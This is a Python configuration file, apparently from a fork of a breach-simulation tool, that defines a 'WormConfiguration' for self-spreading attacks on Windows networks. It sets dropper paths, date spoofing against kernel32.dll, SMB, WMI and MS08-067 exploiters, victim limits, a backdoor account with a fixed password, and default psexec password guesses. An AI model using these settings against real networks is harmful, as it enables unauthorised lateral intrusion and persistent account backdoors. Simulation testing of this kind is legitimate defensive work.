forked from p15670423/monkey
85 lines
2.4 KiB
85 lines
2.4 KiB
import os
import sys
import ntpath
from network.range import ClassCRange, RelativeRange, FixedRange
from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter
from network import TcpScanner, PingScanner
__author__ = 'itamar'
class WormConfiguration(object):
### logging config
use_file_logging = True
dropper_log_path = os.path.expandvars("%temp%\~df1562.tmp")
monkey_log_path = os.path.expandvars("%temp%\~df1563.tmp")
### dropper config
dropper_try_move_first = sys.argv[0].endswith(".exe")
dropper_set_date = True
dropper_date_reference_path = r"\windows\system32\kernel32.dll"
dropper_target_path = ntpath.join(r"C:\Windows", ntpath.split(sys.argv[0])[-1])
### monkey config
singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
# how long to wait between scan iterations
timeout_between_iterations = 10
# how many scan iterations to perform on each run
max_iterations = 2
scanner_class = TcpScanner
exploiter_classes = WmiExploiter, SmbExploiter, Ms08_067_Exploiter
# how many victims to look for in a single scan iteration
victims_max_find = 14
# how many victims to exploit before stopping
victims_max_exploit = 7
command_server = ""
### scanners config
#range_class = RelativeRange
#range_size = 8
range_class = FixedRange
range_fixed = ("", "", "", "",
"", "", "",
"", "", "")
# TCP Scanner
tcp_target_ports = [445, 135]
tcp_scan_timeout = 1000 # 1000 Milliseconds
tcp_scan_interval = 200
# Ping Scanner
ping_scan_timeout = 1000
### exploiters config
skip_exploit_if_file_exist = True
ms08_067_exploit_attempts = 5
ms08_067_remote_user_add = "IUSER_SUPPORT"
ms08_067_remote_user_pass = "Password1!"
# psexec exploiter
psexec_user = "Administrator"
psexec_passwords = ["1234", "password", "Password1!", "password", "12345678"]